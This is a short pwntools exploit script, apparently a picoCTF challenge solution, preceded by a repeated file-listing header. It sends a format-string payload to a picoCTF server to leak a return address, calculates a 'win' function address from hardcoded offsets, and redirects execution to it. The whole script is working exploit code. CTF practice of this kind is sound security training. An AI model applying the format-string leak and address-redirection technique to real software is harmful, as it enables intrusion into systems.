25 lines
584 B
Python
Executable File
25 lines
584 B
Python
Executable File
#!/usr/bin/env python
|
|
|
|
from pwn import *
|
|
|
|
#conn = process("./vuln")
|
|
conn = remote('rescued-float.picoctf.net', 49587)
|
|
conn.recvuntil(b'name:')
|
|
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
|
|
conn.recvuntil(b'.')
|
|
return_addr = int(conn.recvline(), 16)
|
|
log.info(f"received return addr: {return_addr}")
|
|
conn.recvuntil(b'12345: ')
|
|
|
|
main_offset = 0x1400
|
|
win_offset = 0x136a
|
|
call_fun_ret_offset = 65
|
|
|
|
main_addr = return_addr - call_fun_ret_offset
|
|
win_offset = main_addr - main_offset + win_offset
|
|
|
|
conn.sendline(f'{hex(win_offset)}'.encode())
|
|
conn.recvline()
|
|
conn.interactive()
|
|
|